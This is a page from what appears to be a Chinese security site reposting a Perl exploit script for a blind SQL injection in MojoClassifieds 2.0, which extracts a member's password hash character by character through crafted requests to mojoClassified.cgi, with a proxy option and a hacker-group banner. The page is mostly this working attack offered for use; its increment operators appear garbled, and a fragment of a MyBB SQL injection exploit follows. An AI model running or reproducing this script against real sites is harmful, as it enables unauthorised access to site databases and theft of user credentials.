建站极客  
                        网络安全                          Exploit                          正文 
                     
                 
                
                    MojoClassifieds 2.0 Remote Blind SQL Injection Exploit                 
                
                    所属分类:
                        网络安全  / Exploit                      
                    阅读数:
                        124 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    #!/usr/bin/perl 
use LWP::UserAgent; 
use Getopt::Long; 
if(!$ARGV[1]) 
{ 
  print "                                                                \n"; 
  print "   #################### Viva IslaMe Viva IslaMe ################\n"; 
  print "   #   MojoClassifieds Blind SQL Injection Exploit             #\n"; 
  print "   #                                (mojoClassified.cgi mojo ) #\n"; 
  print "   #   Author: Mr.SQL                                          #\n"; 
  print "   #   EMAIL : SQL@HOTMAIL.IT                                  #\n"; 
  print "   #                                                           #\n"; 
  print "   #                -((:: GrE3E3E3E3E3ETZ ::))-                #\n"; 
  print "   #                                                           #\n"; 
  print "   #   HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab  #\n"; 
  print "   #                :: ALwHeD :: milw0rm ::                    #\n"; 
  print "   #                                                           #\n"; 
  print "   #              <<>>   MuSliMs HaCkErS   <<>>                #\n"; 
  print "   #                                                           #\n"; 
  print "   #   HOME:    WwW.PaL-HaCkEr.CoM                             #\n"; 
  print "   #                                                           #\n"; 
  print "   #   Usage  : perl test.pl host                              #\n"; 
  print "   #   Example: perl test.pl www.host.com / -d 10              #\n"; 
  print "   #   Options:                                                #\n"; 
  print "   #     -d    valid cat_a  value                              #\n"; 
  print "   #############################################################\n"; 
  exit; 
} 
my $host     = $ARGV[0]; 
my $cat_a      = $ARGV[2]; 
my %options = (); 
GetOptions(\%options, "u=i", "p=s", "d=i"); 
print "[~] Exploiting...\n"; 
if($options{"b"}) 
{ 
  $mojo = $options{"b"}; 
} 
syswrite(STDOUT, "[~] MD5-Hash: ", 14); 
for(my $i = 1; $i <= 32; $i  ) 
{ 
  my $f = 0; 
  my $h = 48; 
  while(!$f && $h <= 57) 
  { 
    if(istrue2($host, $cat_a, $i, $h)) 
    { 
      $f = 1; 
      syswrite(STDOUT, chr($h), 1); 
    } 
    $h  ; 
  } 
  if(!$f) 
  { 
    $h = 97; 
    while(!$f && $h <= 122) 
    { 
      if(istrue2($host, $cat_a, $i, $h)) 
      { 
        $f = 1; 
        syswrite(STDOUT, chr($h), 1); 
      } 
      $h  ; 
    } 
  } 
} 
print "\n[~] Exploiting done\n"; 
sub istrue2 
{ 
  my $host    = shift; 
  my $cat_a     = shift; 
  my $i       = shift; 
  my $h       = shift; 
 
  my $ua = LWP::UserAgent->new; 
  my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; 
 
  if($options{"p"}) 
  { 
    $ua->proxy('http', "http://".$options{"p"}); 
  } 
 
  my $resp    = $ua->get($query); 
  my $content = $resp->content; 
  my $regexp  = "tourterms.pdf"; 
 
  if($content =~ /$regexp/) 
  { 
    return 1; 
  } 
  else 
  { 
    return 0; 
  } 
} 
                                     
             
            
                
                MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多